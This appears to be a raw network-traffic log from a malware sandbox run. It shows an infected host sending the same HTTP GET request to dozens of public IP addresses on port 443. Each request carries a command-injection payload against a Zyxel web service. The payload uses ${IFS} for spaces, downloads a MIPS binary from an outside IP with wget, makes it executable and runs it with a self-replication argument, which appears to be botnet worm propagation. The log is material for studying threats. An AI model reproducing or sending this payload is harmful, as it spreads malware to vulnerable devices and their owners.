                                                Jan 28, 2024 10:16:33.929930925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6520192.168.2.2345806124.15.46.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929965019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6521192.168.2.234466274.197.173.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929995060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6522192.168.2.2335360106.254.182.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930025101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6523192.168.2.2354032112.239.191.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930056095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6524192.168.2.235871693.211.195.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930094957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6525192.168.2.2342916100.15.137.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930124998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6526192.168.2.235664672.39.222.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930155993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6527192.168.2.233338241.4.83.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930191040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6528192.168.2.234008866.197.216.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930234909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6529192.168.2.235692286.63.151.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930263042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6530192.168.2.2335956158.200.158.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930299044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6531192.168.2.235857680.157.227.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930320024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6532192.168.2.2337740182.145.208.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930336952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6533192.168.2.2346588123.254.254.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930349112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6534192.168.2.2340234112.70.204.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930382013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6535192.168.2.2355446183.230.10.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930391073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6536192.168.2.2343024152.187.62.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930408001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6537192.168.2.234739271.35.181.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930425882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6538192.168.2.2348938144.212.131.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930430889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6539192.168.2.2333202141.111.251.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930505991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6540192.168.2.234112617.122.237.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930507898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6541192.168.2.234196061.120.144.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930538893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6542192.168.2.235824042.106.100.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930543900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6543192.168.2.2334960184.253.93.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930551052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6544192.168.2.2355312179.210.128.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930672884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6545192.168.2.23476785.103.101.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930684090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6546192.168.2.235909261.112.71.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930682898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6547192.168.2.2343324219.189.149.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930708885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6548192.168.2.2337916155.178.69.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930721998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6549192.168.2.2348680202.133.73.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930805922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6550192.168.2.2336924177.14.90.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930814981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6551192.168.2.236070835.224.203.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930828094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6552192.168.2.235558812.85.197.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930828094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6553192.168.2.234145654.89.46.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930857897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6554192.168.2.235063824.229.109.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930898905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6555192.168.2.2351414185.132.239.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930937052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6556192.168.2.2350312123.107.119.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.930941105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6557192.168.2.233826859.62.60.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931004047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6558192.168.2.2333342172.86.5.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931014061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6559192.168.2.233956657.52.30.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931049109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6560192.168.2.2350050144.238.21.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931049109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6561192.168.2.2342316210.185.78.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931109905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6562192.168.2.2349844189.178.138.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931109905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6563192.168.2.234779827.174.8.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931113005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6564192.168.2.2336066115.93.40.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931111097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6565192.168.2.234305480.85.163.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931158066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6566192.168.2.234405694.188.35.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931180000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6567192.168.2.234327025.20.197.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931221008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6568192.168.2.235499283.96.161.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931257010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6569192.168.2.2335884211.232.198.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931294918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6570192.168.2.2345638194.104.242.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931307077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6571192.168.2.235875498.151.69.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931366920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6572192.168.2.2341450102.207.156.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931384087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6573192.168.2.2337828144.53.54.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931400061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6574192.168.2.2351726112.144.244.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931442022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6575192.168.2.235161668.71.61.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931473970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6576192.168.2.2337934189.217.132.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931497097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6577192.168.2.2335844203.116.15.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931519985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6578192.168.2.235293695.139.171.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931561947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6579192.168.2.234862292.49.17.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931586027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6580192.168.2.2339126149.198.181.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.931602955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6581192.168.2.2344426102.246.113.162443
                                                TimestampBytes transferredDirectionData
